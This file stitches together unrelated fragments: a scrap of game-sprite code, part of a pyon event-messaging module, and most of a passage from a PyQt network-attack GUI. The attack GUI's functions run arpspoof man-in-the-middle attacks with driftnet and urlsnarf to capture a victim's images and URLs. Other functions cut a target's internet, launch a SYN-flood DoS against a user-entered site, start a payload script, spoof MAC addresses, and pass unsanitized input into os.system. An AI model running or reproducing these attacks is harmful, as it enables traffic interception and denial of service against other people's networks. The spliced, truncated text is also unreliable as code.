if self.change_x < 0 and self.character_face_direction == RIGHT_FACING:
self.character_face_direction = LEFT_FACING
elif (
self.change_x > 0 and
self.character_face_direction == LEFT_FACING
| |
#!/usr/bin/env python
"""Events framework with publisher, subscriber and repository."""
__author__ = '<NAME> <<EMAIL>>, <NAME>'
import functools
import sys
import threading
import traceback
from gevent import event as gevent_event
from pyon.core import bootstrap, MSG_HEADER_ACTOR
from pyon.core.bootstrap import CFG
from pyon.core.exception import BadRequest, IonException, StreamException
from pyon.datastore.datastore import DataStore
from pyon.datastore.datastore_query import QUERY_EXP_KEY, DatastoreQueryBuilder, DQ
from pyon.ion.identifier import create_unique_event_id, create_simple_unique_id
from pyon.net.endpoint import Publisher, Subscriber, BaseEndpoint
from pyon.net.transport import XOTransport, NameTrio
from pyon.util.async import spawn
from pyon.util.containers import get_ion_ts_millis, is_valid_ts
from pyon.util.log import log
from interface.objects import Event
#The event will be ignored if older than this time period
VALID_EVENT_TIME_PERIOD = 365 * 24 * 60 * 60 * 1000 # one year
DEFAULT_SYSTEM_XS = "system"
DEFAULT_EVENTS_XP = "events"
# Alternative way to set process context
event_context = threading.local()
class EventError(IonException):
status_code = 500
class EventPublisher(Publisher):
@classmethod
def get_events_exchange_point(cls):
# match with default output of XOs
root_xs = CFG.get_safe("exchange.core.system_xs", DEFAULT_SYSTEM_XS)
events_xp = CFG.get_safe("exchange.core.events", DEFAULT_EVENTS_XP)
return "%s.%s.%s" % (bootstrap.get_sys_name(), root_xs, events_xp)
def __init__(self, event_type=None, xp=None, process=None, **kwargs):
"""
Constructs a publisher of events for a specific type.
@param event_type The name of the event type object
@param xp Exchange (AMQP) name, can be none, will use events default.
"""
self.event_type = event_type
self.process = process
self._events_xp = CFG.get_safe("exchange.core.events", DEFAULT_EVENTS_XP)
if bootstrap.container_instance and getattr(bootstrap.container_instance, 'event_repository', None):
self.event_repo = bootstrap.container_instance.event_repository
else:
self.event_repo = None
# generate an exchange name to publish events to
container = (hasattr(self, '_process') and hasattr(self._process, 'container') and self._process.container) or BaseEndpoint._get_container_instance()
if container and container.has_capability(container.CCAP.EXCHANGE_MANAGER): # might be too early in chain
xp = xp or container.create_xp(self._events_xp)
to_name = xp
else:
xp = xp or self.get_events_exchange_point()
to_name = (xp, None)
Publisher.__init__(self, to_name=to_name, **kwargs)
def _topic(self, event_object):
"""
Builds the topic that this event should be published to.
"""
assert event_object
base_types = event_object.base_types or []
base_str = ".".join(reversed(base_types))
sub_type = event_object.sub_type or "_"
origin_type = event_object.origin_type or "_"
routing_key = "%s.%s.%s.%s.%s" % (base_str, event_object._get_type(), sub_type, origin_type, event_object.origin)
return routing_key
def publish_event_object(self, event_object):
"""
Publishes an event of given type for the given origin. Event_type defaults to an
event_type set when initializing the EventPublisher. Other kwargs fill out the fields
of the event. This operation will fail with an exception.
@param event_object the event object to be published
@retval event_object the event object which was published
"""
if not event_object:
raise BadRequest("Must provide event_object")
event_object.base_types = event_object._get_extends()
topic = self._topic(event_object) # Routing key generated using type_, base_types, origin, origin_type, sub_type
container = (hasattr(self, '_process') and hasattr(self._process, 'container') and self._process.container) or BaseEndpoint._get_container_instance()
if container and container.has_capability(container.CCAP.EXCHANGE_MANAGER):
# make sure we are an xp, if not, upgrade
if not isinstance(self._send_name, XOTransport):
default_nt = NameTrio(self.get_events_exchange_point())
if isinstance(self._send_name, NameTrio) \
and self._send_name.exchange == default_nt.exchange \
and self._send_name.queue == default_nt.queue \
and self._send_name.binding == default_nt.binding:
self._send_name = container.create_xp(self._events_xp)
else:
self._send_name = container.create_xp(self._send_name)
xp = self._send_name
to_name = xp.create_route(topic)
else:
to_name = (self._send_name.exchange, topic)
current_time = get_ion_ts_millis()
# Ensure valid created timestamp if supplied
if event_object.ts_created:
if not is_valid_ts(event_object.ts_created):
raise BadRequest("The ts_created value is not a valid timestamp: '%s'" % (event_object.ts_created))
# Reject events that are older than specified time
if int(event_object.ts_created) > ( current_time + VALID_EVENT_TIME_PERIOD ):
raise BadRequest("This ts_created value is too far in the future:'%s'" % (event_object.ts_created))
# Reject events that are older than specified time
if int(event_object.ts_created) < (current_time - VALID_EVENT_TIME_PERIOD) :
raise BadRequest("This ts_created value is too old:'%s'" % (event_object.ts_created))
else:
event_object.ts_created = str(current_time)
# Set the actor id based on
if not event_object.actor_id:
event_object.actor_id = self._get_actor_id()
#Validate this object - ideally the validator should pass on problems, but for now just log
#any errors and keep going, since seeing invalid situations are better than skipping validation.
try:
event_object._validate()
except Exception as e:
log.exception(e)
#Ensure the event object has a unique id
if '_id' in event_object:
raise BadRequest("The event object cannot contain a _id field '%s'" % (event_object))
#Generate a unique ID for this event
event_object._id = create_unique_event_id()
try:
self.publish(event_object, to_name=to_name)
except Exception as ex:
log.exception("Failed to publish event (%s): '%s'" % (ex.message, event_object))
raise
return event_object
def publish_event(self, origin=None, event_type=None, **kwargs):
"""
Publishes an event of given type for the given origin. Event_type defaults to an
event_type set when initializing the EventPublisher. Other kwargs fill out the fields
of the event. This operation will fail with an exception.
@param origin the origin field value
@param event_type the event type (defaults to the EventPublisher's event_type if set)
@param kwargs additional event fields
@retval event_object the event object which was published
"""
event_type = event_type or self.event_type
if not event_type:
raise BadRequest("No event_type provided")
event_object = bootstrap.IonObject(event_type, origin=origin, **kwargs)
ret_val = self.publish_event_object(event_object)
return ret_val
def _get_actor_id(self):
"""Returns the current ion-actor-id from incoming process headers"""
actor_id = ""
try:
if self.process:
ctx = self.process.get_context()
actor_id = ctx.get(MSG_HEADER_ACTOR, None) or ""
except Exception as ex:
pass
actor_id = actor_id or getattr(event_context, "actor_id", None) or ""
return actor_id
# Helper for bootstrap purposes
local_event_queues = []
class BaseEventSubscriberMixin(object):
"""
A mixin class for Event subscribers to facilitate inheritance.
EventSubscribers must come in both standard and process level versions, which
rely on common base code. It is difficult to multiple inherit due to both of
them sharing a base class, so this mixin is preferred.
"""
ALL_EVENTS = "#"
@staticmethod
def _topic(event_type, origin, sub_type=None, origin_type=None):
"""
Builds the topic that this event should be published to.
If either side of the event_id.origin pair are missing, will subscribe to anything.
"""
if event_type == "Event":
event_type = "Event.#"
elif event_type:
event_type = "#.%s.#" % event_type
else:
event_type = "#"
sub_type = sub_type or "*.#"
origin_type = origin_type or "*"
origin = origin or "*"
return "%s.%s.%s.%s" % (event_type, sub_type, origin_type, origin)
def __init__(self, xp_name=None, event_type=None, origin=None, queue_name=None,
sub_type=None, origin_type=None, pattern=None, auto_delete=None):
self._events_xp = CFG.get_safe("exchange.core.events", DEFAULT_EVENTS_XP)
self.event_type = event_type
self.sub_type = sub_type
self.origin_type = origin_type
self.origin = origin
# Default for auto_delete is True for events, unless otherwise specified
if auto_delete is None:
auto_delete = True
self._auto_delete = auto_delete
xp_name = xp_name or self._events_xp
if pattern:
binding = pattern
else:
binding = self._topic(event_type, origin, sub_type, origin_type)
# create queue_name if none passed in
if queue_name is None:
queue_name = "subsc_" + create_simple_unique_id()
# prepend proc name to queue name if we have one
if hasattr(self, "_process") and self._process:
queue_name = "%s_%s" % (self._process._proc_name, queue_name)
# do we have a container/ex_manager?
container = (hasattr(self, '_process') and hasattr(self._process, 'container') and self._process.container) or BaseEndpoint._get_container_instance()
if container:
xp = container.create_xp(xp_name)
xne = container.create_event_xn(queue_name,
pattern=binding,
xp=xp,
auto_delete=auto_delete)
self._ev_recv_name = xne
self.binding = None
else:
# Remove this case. No container??
self.binding = binding
# prefix the queue_name, if specified, with the sysname
queue_name = "%s.system.%s" % (bootstrap.get_sys_name(), queue_name)
# set this name to be picked up by inherited folks
self._ev_recv_name = (xp_name, queue_name)
local_event_queues.append(queue_name)
def add_event_subscription(self, event_type=None, origin=None, sub_type=None, origin_type=None):
""" An another event subscription based on given characteristics. """
binding = self._topic(event_type, origin, sub_type, origin_type)
if isinstance(self._ev_recv_name, XOTransport):
self._ev_recv_name.bind(binding)
else:
raise BadRequest("Non XO event subscriber not supported")
def remove_event_subscription(self, event_type=None, origin=None, sub_type=None, origin_type=None):
""" Remove an event subscription based on given characteristics. """
binding = self._topic(event_type, origin, sub_type, origin_type)
if isinstance(self._ev_recv_name, XOTransport):
self._ev_recv_name.unbind(binding)
else:
raise BadRequest("Non XO event subscriber not supported")
class EventSubscriber(Subscriber, BaseEventSubscriberMixin):
"""Manages a subscription to an event queue for a select set of event types or
event origins or other specialized binding.
"""
def __init__(self, xp_name=None, event_type=None, origin=None, queue_name=None, callback=None,
sub_type=None, origin_type=None, pattern=None, auto_delete=None, *args, **kwargs):
"""
Initializer.
If the queue_name is specified here, the sysname is prefixed automatically to it. This is because
named queues are not namespaces to their exchanges, so two different systems on the same broker
can cross-pollute messages if a named queue is used.
Note: an EventSubscriber needs to be closed to free broker resources
"""
self._cbthread = None
# sets self._ev_recv_name, self.binding
BaseEventSubscriberMixin.__init__(self, xp_name=xp_name, event_type=event_type, origin=origin,
queue_name=queue_name, sub_type=sub_type, origin_type=origin_type,
pattern=pattern, auto_delete=auto_delete)
log.debug("EventPublisher events pattern %s", self.binding)
from_name = self._get_from_name()
binding = self._get_binding()
Subscriber.__init__(self, from_name=from_name, binding=binding, callback=callback,
auto_delete=self._auto_delete, **kwargs)
def _get_from_name(self):
"""
Returns the from_name that the base Subscriber should listen on.
This is overridden in the process | |
-sP -v {} -oN output.txt".format(self.lineEdit_site.text().lower()))
with open("output.txt","r+") as file:
info=file.read()
self.plainTextEdit_result.clear()
self.plainTextEdit_result.insertPlainText(info)
msg1 = QMessageBox()
msg1.setWindowTitle("Information")
msg1.setBaseSize(300,300)
msg1.setWindowIcon(QtGui.QIcon('images/icon.png'))
msg1.setIcon(QMessageBox.Information)
msg1.setText("Scan completed successfully")
msg1.exec_()
elif reply==QMessageBox.No:
msg1 = QMessageBox()
msg1.setWindowTitle("Warning")
msg1.setBaseSize(300,300)
msg1.setWindowIcon(QtGui.QIcon('images/icon.png'))
msg1.setIcon(QMessageBox.Critical)
msg1.setText("Nmap scan could not be started.")
msg1.exec_()
except:
msg1 = QMessageBox()
msg1.setWindowTitle("Warning")
msg1.setBaseSize(300,300)
msg1.setWindowIcon(QtGui.QIcon('images/icon.png'))
msg1.setIcon(QMessageBox.Critical)
msg1.setText("Error,something went wrong.Please Try Again")
msg1.exec_()
def clear(self):
msgbox = QMessageBox(QMessageBox.Question, "Riglsable", "Are you sure you want to clear the results?")
msgbox.addButton(QMessageBox.Yes)
msgbox.addButton(QMessageBox.No)
msgbox.setWindowIcon(QtGui.QIcon('images/icon.png'))
msgbox.setWindowIcon(QtGui.QIcon('images/icon.png'))
reply = msgbox.exec()
if reply==QMessageBox.Yes:
self.plainTextEdit_result.clear()
def sniff_image(self):
if self.lineEdit_router_ip_address.text()=="" and self.lineEdit_target_ip_address.text()=="":
msg9 = QMessageBox()
msg9.setWindowTitle("Information")
msg9.setBaseSize(300,300)
msg9.setWindowIcon(QtGui.QIcon('images/icon.png'))
msg9.setIcon(QMessageBox.Warning)
msg9.setText("Please enter the target IP address and Gateway IP address! !")
msg9.exec_()
elif self.lineEdit_router_ip_address.text()=="":
msg6 = QMessageBox()
msg6.setWindowTitle("Information")
msg6.setBaseSize(300,300)
msg6.setWindowIcon(QtGui.QIcon('images/icon.png'))
msg6.setIcon(QMessageBox.Warning)
msg6.setText("Please enter the Gateway IP address!")
msg6.exec_()
elif self.lineEdit_target_ip_address.text()=="":
msg5 = QMessageBox()
msg5.setWindowTitle("Information")
msg5.setBaseSize(300,300)
msg5.setWindowIcon(QtGui.QIcon('images/icon.png'))
msg5.setIcon(QMessageBox.Warning)
msg5.setText("Please enter the target IP address!")
msg5.exec_()
else:
self.plainTextEdit_result.clear()
self.plainTextEdit_result.setStyleSheet("color:red;")
self.plainTextEdit_result.insertPlainText("To stop the attack, close the terminals with ctrl+c .")
os.system("echo 1 > /proc/sys/net/ipv4/ip_forward")
os.system("gnome-terminal --window -x arpspoof -i eth0 -t {} {} ".format(self.lineEdit_router_ip_address.text(),self.lineEdit_target_ip_address.text()))
os.system("gnome-terminal --window -x arpspoof -i eth0 -t {} {} ".format(self.lineEdit_target_ip_address.text(),self.lineEdit_router_ip_address.text()))
os.system("gnome-terminal --window -x driftnet -i eth0")
msg = QMessageBox()
msg.setWindowTitle("Information")
msg.setBaseSize(300,300)
msg.setWindowIcon(QtGui.QIcon('images/icon.png'))
msg.setText("Attack initiating,please wait...")
msg.setIcon(QMessageBox.Information)
msg.exec_()
def sniff_url(self):
if self.lineEdit_router_ip_address.text()=="" and self.lineEdit_target_ip_address.text()=="":
msg9 = QMessageBox()
msg9.setWindowTitle("Information")
msg9.setBaseSize(300,300)
msg9.setWindowIcon(QtGui.QIcon('images/icon.png'))
msg9.setIcon(QMessageBox.Warning)
msg9.setText("Please enter the target IP address and Gateway IP address! !")
msg9.exec_()
elif self.lineEdit_router_ip_address.text()=="":
msg6 = QMessageBox()
msg6.setWindowTitle("Information")
msg6.setBaseSize(300,300)
msg6.setWindowIcon(QtGui.QIcon('images/icon.png'))
msg6.setIcon(QMessageBox.Warning)
msg6.setText("Please enter the Gateway IP address!")
msg6.exec_()
elif self.lineEdit_target_ip_address.text()=="":
msg5 = QMessageBox()
msg5.setWindowTitle("Information")
msg5.setBaseSize(300,300)
msg5.setWindowIcon(QtGui.QIcon('images/icon.png'))
msg5.setIcon(QMessageBox.Warning)
msg5.setText("Please enter the target IP address!")
msg5.exec_()
else:
self.plainTextEdit_result.clear()
self.plainTextEdit_result.setStyleSheet("color:red;")
self.plainTextEdit_result.insertPlainText("To stop the attack, close the terminals with ctrl+c .")
os.system("echo 1 > /proc/sys/net/ipv4/ip_forward")
os.system("gnome-terminal --window -x arpspoof -i eth0 -t {} {} ".format(self.lineEdit_router_ip_address.text(),self.lineEdit_target_ip_address.text()))
os.system("gnome-terminal --window -x arpspoof -i eth0 -t {} {} ".format(self.lineEdit_target_ip_address.text(),self.lineEdit_router_ip_address.text()))
os.system("gnome-terminal --window -x urlsnarf -i eth0")
msg = QMessageBox()
msg.setWindowTitle("Information")
msg.setBaseSize(300,300)
msg.setWindowIcon(QtGui.QIcon('images/icon.png'))
msg.setText("Attack initiating,please wait...")
msg.setIcon(QMessageBox.Information)
msg.exec_()
def block_net(self):
if self.lineEdit_router_ip_address.text()=="" and self.lineEdit_target_ip_address.text()=="":
msg9 = QMessageBox()
msg9.setWindowTitle("Information")
msg9.setBaseSize(300,300)
msg9.setWindowIcon(QtGui.QIcon('images/icon.png'))
msg9.setIcon(QMessageBox.Warning)
msg9.setText("Please enter the target IP address and Gateway IP address! !")
msg9.exec_()
elif self.lineEdit_router_ip_address.text()=="":
msg6 = QMessageBox()
msg6.setWindowTitle("Information")
msg6.setBaseSize(300,300)
msg6.setWindowIcon(QtGui.QIcon('images/icon.png'))
msg6.setIcon(QMessageBox.Warning)
msg6.setText("Please enter the Gateway IP address!")
msg6.exec_()
elif self.lineEdit_target_ip_address.text()=="":
msg5 = QMessageBox()
msg5.setWindowTitle("Information")
msg5.setBaseSize(300,300)
msg5.setWindowIcon(QtGui.QIcon('images/icon.png'))
msg5.setIcon(QMessageBox.Warning)
msg5.setText("Please enter the target IP address!")
msg5.exec_()
else:
self.plainTextEdit_result.clear()
self.plainTextEdit_result.setStyleSheet("color:red;")
self.plainTextEdit_result.insertPlainText("To stop the attack, close the terminals with ctrl+c .")
msg = QMessageBox()
msg.setWindowTitle("Information")
msg.setBaseSize(300,300)
msg.setWindowIcon(QtGui.QIcon('images/icon.png'))
msg.setIcon(QMessageBox.Information)
msg.setText("Attack initiating,please wait...")
msg.exec_()
os.system("echo 0 > /proc/sys/net/ipv4/ip_forward")
os.system("gnome-terminal --window -x arpspoof -i eth0 -t {} {} ".format(self.lineEdit_router_ip_address.text(),self.lineEdit_target_ip_address.text()))
os.system("gnome-terminal --window -x arpspoof -i eth0 -t {} {} ".format(self.lineEdit_target_ip_address.text(),self.lineEdit_router_ip_address.text()))
msg1 = QMessageBox()
msg1.setWindowTitle("Information")
msg1.setBaseSize(300,300)
msg1.setWindowIcon(QtGui.QIcon('images/icon.png'))
msg1.setIcon(QMessageBox.Information)
msg1.setText("IP forwarding: 0")
msg1.exec_()
def free_net(self):
self.plainTextEdit_result.clear()
self.plainTextEdit_result.setStyleSheet("color:red;")
self.plainTextEdit_result.insertPlainText("The target's Internet is unlocked")
os.system("echo 1 > /proc/sys/net/ipv4/ip_forward")
msg = QMessageBox()
msg.setWindowTitle("Information")
msg.setBaseSize(300,300)
msg.setWindowIcon(QtGui.QIcon('images/icon.png'))
msg.setIcon(QMessageBox.Information)
msg.setText("IP Forwarding: 1")
msg.exec_()
def netdiscover(self):
try:
if(self.lineEdit_router.text()==""):
msg5 = QMessageBox()
msg5.setWindowTitle("Information")
msg5.setBaseSize(300,300)
msg5.setWindowIcon(QtGui.QIcon('images/icon.png'))
msg5.setIcon(QMessageBox.Warning)
msg5.setText("Please enter Local Gateway IP address")
msg5.exec_()
else:
self.plainTextEdit_result.clear()
self.plainTextEdit_result.setStyleSheet("color:white;")
self.plainTextEdit_result.insertPlainText("Local network scanning,please wait...")
msg = QMessageBox()
msg.setWindowTitle("Information")
msg.setBaseSize(300,300)
msg.setWindowIcon(QtGui.QIcon('images/icon.png'))
msg.setText("Local network scanning,please wait...")
msg.setIcon(QMessageBox.Information)
msg.exec_()
os.system("gnome-terminal --window -x netdiscover -r {}/16".format(self.lineEdit_router.text()))
self.plainTextEdit_result.clear()
except:
msg1 = QMessageBox()
msg1.setWindowTitle("Warning")
msg1.setBaseSize(300,300)
msg1.setWindowIcon(QtGui.QIcon('images/icon.png'))
msg1.setIcon(QMessageBox.Critical)
msg1.setText("Error,something went wrong.Please Try Again")
msg1.exec_()
def nmap_network_scanner(self):
try:
if(self.lineEdit_router.text()==""):
msg5 = QMessageBox()
msg5.setWindowTitle("Information")
msg5.setBaseSize(300,300)
msg5.setWindowIcon(QtGui.QIcon('images/icon.png'))
msg5.setIcon(QMessageBox.Warning)
msg5.setText("Please enter Local Gateway IP address")
msg5.exec_()
else:
self.plainTextEdit_result.clear()
self.plainTextEdit_result.setStyleSheet("color:white;")
self.plainTextEdit_result.insertPlainText("Nmap local network scanning,please wait...")
msg = QMessageBox()
msg.setWindowTitle("Information")
msg.setBaseSize(300,300)
msg.setWindowIcon(QtGui.QIcon('images/icon.png'))
msg.setText("Nmap local network scanning,please wait...")
msg.setIcon(QMessageBox.Information)
msg.exec_()
os.system("nmap -sn -n -v --open {}/24 -oN output.txt".format(self.lineEdit_router.text()))
file=open("output.txt","r+")
info=file.read()
file.close()
self.plainTextEdit_result.clear()
self.plainTextEdit_result.insertPlainText(info)
msg1 = QMessageBox()
msg1.setWindowTitle("Information")
msg1.setBaseSize(300,300)
msg1.setWindowIcon(QtGui.QIcon('images/icon.png'))
msg1.setText("Nmap local network scan completed successfully.")
msg1.setIcon(QMessageBox.Information)
msg1.exec_()
except:
msg1 = QMessageBox()
msg1.setWindowTitle("Warning")
msg1.setBaseSize(300,300)
msg1.setWindowIcon(QtGui.QIcon('images/icon.png'))
msg1.setIcon(QMessageBox.Critical)
msg1.setText("Error,something went wrong.Please Try Again")
msg1.exec_()
def payload(self):
try:
self.plainTextEdit_result.clear()
self.plainTextEdit_result.setStyleSheet("color:white;")
self.plainTextEdit_result.insertPlainText("Application is starting...")
msg = QMessageBox()
msg.setWindowTitle("Information")
msg.setBaseSize(300,300)
msg.setWindowIcon(QtGui.QIcon('images/icon.png'))
msg.setText("Application is started")
msg.setIcon(QMessageBox.Information)
msg.exec_()
os.system("gnome-terminal --window -x python3 payload.py")
self.plainTextEdit_result.clear()
except:
msg1 = QMessageBox()
msg1.setWindowTitle("Warning")
msg1.setBaseSize(300,300)
msg1.setWindowIcon(QtGui.QIcon('images/icon.png'))
msg1.setIcon(QMessageBox.Critical)
msg1.setText("Error,something went wrong.Please Try Again")
msg1.exec_()
def macchanger_random(self):
try:
if self.combobox.currentText()=="Interface":
msg1 = QMessageBox()
msg1.setWindowTitle("Warning")
msg1.setBaseSize(300,300)
msg1.setWindowIcon(QtGui.QIcon('images/icon.png'))
msg1.setIcon(QMessageBox.Critical)
msg1.setText("Select Your Interface (eth0 or wlan0)")
msg1.exec_()
else:
msgbox = QMessageBox(QMessageBox.Question, "Mac Address Changer", "If you confirm, your internet will be cut for a few seconds.Are you sure?")
msgbox.addButton(QMessageBox.Yes)
msgbox.addButton(QMessageBox.No)
msgbox.setWindowIcon(QtGui.QIcon('images/icon.png'))
reply = msgbox.exec()
if reply==QMessageBox.Yes:
self.plainTextEdit_result.clear()
self.plainTextEdit_result.setStyleSheet("color:white;")
self.plainTextEdit_result.insertPlainText("Changing mac address,please wait...")
os.system("macchanger -r {} > output.txt".format(self.combobox.currentText()))
os.system("ifconfig {} down".format(self.combobox.currentText()))
time.sleep(1)
os.system("ifconfig {} up".format(self.combobox.currentText()))
msg = QMessageBox()
msg.setWindowTitle("Information")
msg.setBaseSize(300,300)
msg.setWindowIcon(QtGui.QIcon('images/icon.png'))
msg.setIcon(QMessageBox.Information)
msg.setText("Mac address changed successfully (RANDOM MAC ADDRESS)")
msg.exec_()
self.plainTextEdit_result.clear()
with open("output.txt","r+") as file:
info=file.read()
self.plainTextEdit_result.clear()
self.plainTextEdit_result.insertPlainText(info)
elif reply==QMessageBox.No:
msg1 = QMessageBox()
msg1.setWindowTitle("Warning")
msg1.setBaseSize(300,300)
msg1.setWindowIcon(QtGui.QIcon('images/icon.png'))
msg1.setIcon(QMessageBox.Critical)
msg1.setText("MAC address has not been changed.")
msg1.exec_()
except:
msg1 = QMessageBox()
msg1.setWindowTitle("Warning")
msg1.setBaseSize(300,300)
msg1.setWindowIcon(QtGui.QIcon('images/icon.png'))
msg1.setIcon(QMessageBox.Critical)
msg1.setText("Error,something went wrong.Please Try Again")
msg1.exec_()
def macchanger_original(self):
try:
if self.combobox.currentText()=="Interface":
msg1 = QMessageBox()
msg1.setWindowTitle("Warning")
msg1.setBaseSize(300,300)
msg1.setWindowIcon(QtGui.QIcon('images/icon.png'))
msg1.setIcon(QMessageBox.Critical)
msg1.setText("Select Your Interface (eth0 or wlan0)")
msg1.exec_()
else:
msgbox = QMessageBox(QMessageBox.Question, "Mac Address Changer", "If you confirm, your internet will be cut for a few seconds.Are you sure?")
msgbox.addButton(QMessageBox.Yes)
msgbox.addButton(QMessageBox.No)
msgbox.setWindowIcon(QtGui.QIcon('images/icon.png'))
reply = msgbox.exec()
if reply==QMessageBox.Yes:
self.plainTextEdit_result.clear()
self.plainTextEdit_result.setStyleSheet("color:white;")
self.plainTextEdit_result.insertPlainText("Changing mac address,please wait...")
os.system("macchanger -p {} > output.txt".format(self.combobox.currentText()))
os.system("ifconfig {} down".format(self.combobox.currentText()))
time.sleep(1)
os.system("ifconfig {} up".format(self.combobox.currentText()))
msg = QMessageBox()
msg.setWindowTitle("Information")
msg.setBaseSize(300,300)
msg.setIcon(QMessageBox.Information)
msg.setText("Mac address changed successfully (Original MAC ADDRESS)")
msg.exec_()
self.plainTextEdit_result.clear()
with open("output.txt","r+") as file:
info=file.read()
self.plainTextEdit_result.clear()
self.plainTextEdit_result.insertPlainText(info)
elif reply==QMessageBox.No:
msg1 = QMessageBox()
msg1.setWindowTitle("Warning")
msg1.setBaseSize(300,300)
msg1.setWindowIcon(QtGui.QIcon('images/icon.png'))
msg1.setIcon(QMessageBox.Critical)
msg1.setText("MAC address has not been changed.")
msg1.exec_()
except:
msg1 = QMessageBox()
msg1.setWindowTitle("Warning")
msg1.setBaseSize(300,300)
msg1.setWindowIcon(QtGui.QIcon('images/icon.png'))
msg1.setIcon(QMessageBox.Critical)
msg1.setText("Error,something went wrong.Please Try Again")
msg1.exec_()
def hand_mac(self):
try:
if self.combobox.currentText()=="Interface":
msg1 = QMessageBox()
msg1.setWindowTitle("Warning")
msg1.setBaseSize(300,300)
msg1.setWindowIcon(QtGui.QIcon('images/icon.png'))
msg1.setIcon(QMessageBox.Critical)
msg1.setText("Select Your Interface (eth0 or wlan0)")
msg1.exec_()
elif self.lineEdit_mac.text()=="":
msg1 = QMessageBox()
msg1.setWindowTitle("Warning")
msg1.setBaseSize(300,300)
msg1.setWindowIcon(QtGui.QIcon('images/icon.png'))
msg1.setIcon(QMessageBox.Critical)
msg1.setText("Enter the mac address you want to change!!")
msg1.exec_()
else:
msgbox = QMessageBox(QMessageBox.Question, "Mac Address Changer", "If you confirm, your internet will be cut for a few seconds.Are you sure?")
msgbox.addButton(QMessageBox.Yes)
msgbox.addButton(QMessageBox.No)
msgbox.setWindowIcon(QtGui.QIcon('images/icon.png'))
reply = msgbox.exec()
if reply==QMessageBox.Yes:
self.plainTextEdit_result.clear()
self.plainTextEdit_result.setStyleSheet("color:white;")
self.plainTextEdit_result.insertPlainText("Changing mac address,please wait...")
os.system("macchanger -m {} {} > output.txt".format(self.lineEdit_mac.text(),self.combobox.currentText()))
os.system("ifconfig {} down".format(self.combobox.currentText()))
time.sleep(1)
os.system("ifconfig {} up".format(self.combobox.currentText()))
msg = QMessageBox()
msg.setWindowTitle("Information")
msg.setBaseSize(300,300)
msg.setIcon(QMessageBox.Information)
msg.setWindowIcon(QtGui.QIcon('images/icon.png'))
msg.setText("Mac address changed successfully")
msg.exec_()
self.plainTextEdit_result.clear()
self.lineEdit_mac.clear()
with open("output.txt","r+") as file:
info=file.read()
self.plainTextEdit_result.clear()
self.plainTextEdit_result.insertPlainText(info)
elif reply==QMessageBox.No:
msg1 = QMessageBox()
msg1.setWindowTitle("Warning")
msg1.setBaseSize(300,300)
msg1.setWindowIcon(QtGui.QIcon('images/icon.png'))
msg1.setIcon(QMessageBox.Critical)
msg1.setText("MAC address has not been changed.")
msg1.exec_()
except:
msg1 = QMessageBox()
msg1.setWindowTitle("Warning")
msg1.setBaseSize(300,300)
msg1.setWindowIcon(QtGui.QIcon('images/icon.png'))
msg1.setIcon(QMessageBox.Critical)
msg1.setText("Error,something went wrong.Please Try Again")
msg1.exec_()
def firewall_detection(self):
try:
if self.lineEdit_site.text()=="":
msg5 = QMessageBox()
msg5.setWindowTitle("Information")
msg5.setBaseSize(300,300)
msg5.setWindowIcon(QtGui.QIcon('images/icon.png'))
msg5.setIcon(QMessageBox.Warning)
msg5.setText("Please enter the site adress or IP adress!")
msg5.exec_()
else:
self.plainTextEdit_result.clear()
self.plainTextEdit_result.setStyleSheet("color:white;")
self.plainTextEdit_result.insertPlainText("Firewall detection is starting,please wait...")
msg1 = QMessageBox()
msg1.setWindowTitle("Information")
msg1.setBaseSize(300,300)
msg1.setWindowIcon(QtGui.QIcon('images/icon.png'))
msg1.setIcon(QMessageBox.Information)
msg1.setText("Firewall detection is starting,please wait...")
msg1.exec_()
os.system("wafw00f {} -o output.txt".format(self.lineEdit_site.text().lower()))
with open("output.txt","r+") as file:
info=file.read()
self.plainTextEdit_result.clear()
self.plainTextEdit_result.insertPlainText(info)
self.plainTextEdit_result.insertPlainText(info)
msg2 = QMessageBox()
msg2.setWindowTitle("Information")
msg2.setBaseSize(300,300)
msg2.setWindowIcon(QtGui.QIcon('images/icon.png'))
msg2.setIcon(QMessageBox.Information)
msg2.setText("Firewall detection is finished.")
msg2.exec_()
except:
msg1 = QMessageBox()
msg1.setWindowTitle("Warning")
msg1.setBaseSize(300,300)
msg1.setWindowIcon(QtGui.QIcon('images/icon.png'))
msg1.setIcon(QMessageBox.Critical)
msg1.setText("Error,something went wrong.Please Try Again")
msg1.exec_()
def dos_attack(self):
try:
if self.lineEdit_site.text()=="":
msg1 = QMessageBox()
msg1.setWindowTitle("Information")
msg1.setBaseSize(300,300)
msg1.setWindowIcon(QtGui.QIcon('images/icon.png'))
msg1.setIcon(QMessageBox.Warning)
msg1.setText("Please enter the site adress or IP adress!")
msg1.exec_()
else:
msgbox = QMessageBox(QMessageBox.Question, "Dos Attack", "Doing this attack will make your internet very slow. Are you sure you want to do the attack?")
msgbox.addButton(QMessageBox.Yes)
msgbox.addButton(QMessageBox.No)
msgbox.setWindowIcon(QtGui.QIcon('images/icon.png'))
reply = msgbox.exec()
if reply==QMessageBox.Yes:
self.plainTextEdit_result.clear()
self.plainTextEdit_result.insertPlainText("Dos Attack is starting,please wait...")
os.system("gnome-terminal --window -x python3 dos.py -s {} -p 80 -t 135".format(self.lineEdit_site.text().lower()))
msg = QMessageBox()
msg.setWindowTitle("Information")
msg.setBaseSize(300,300)
msg.setWindowIcon(QtGui.QIcon('images/icon.png'))
msg.setIcon(QMessageBox.Information)
msg.setText("Dos attack is starting...")
msg.exec_()
self.plainTextEdit_result.clear()
for i in range(500):
self.plainTextEdit_result.setStyleSheet("color:red;")
self.plainTextEdit_result.appendPlainText(f"{i}:Denial of service attack, SYN packet send.")
elif reply==QMessageBox.No:
msg1 = QMessageBox()
msg1.setWindowTitle("Warning")
msg1.setBaseSize(300,300)
msg1.setWindowIcon(QtGui.QIcon('images/icon.png'))
msg1.setIcon(QMessageBox.Critical)
msg1.setText("Dos attack not started!")
msg1.exec_()
except:
msg1 = QMessageBox()
msg1.setWindowTitle("Warning")
msg1.setBaseSize(300,300)
msg1.setWindowIcon(QtGui.QIcon('images/icon.png'))
msg1.setIcon(QMessageBox.Critical)
msg1.setText("Error,something went wrong.Please Try Again")
msg1.exec_()
def subdomain(self):
try:
if self.lineEdit_site.text()=="":
msg1 = QMessageBox()
msg1.setWindowTitle("Information")
msg1.setBaseSize(300,300)
msg1.setWindowIcon(QtGui.QIcon('images/icon.png'))
msg1.setIcon(QMessageBox.Warning)
msg1.setText("Please enter the site adress or IP adress!")
msg1.exec_()
elif self.lineEdit_site.text().startswith("https://www"):
self.plainTextEdit_result.clear()
self.plainTextEdit_result.insertPlainText("Searching subdomains,please wait...")
